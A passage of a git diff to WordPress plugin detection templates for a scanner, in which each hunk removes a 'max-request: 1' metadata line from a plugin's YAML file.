a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml 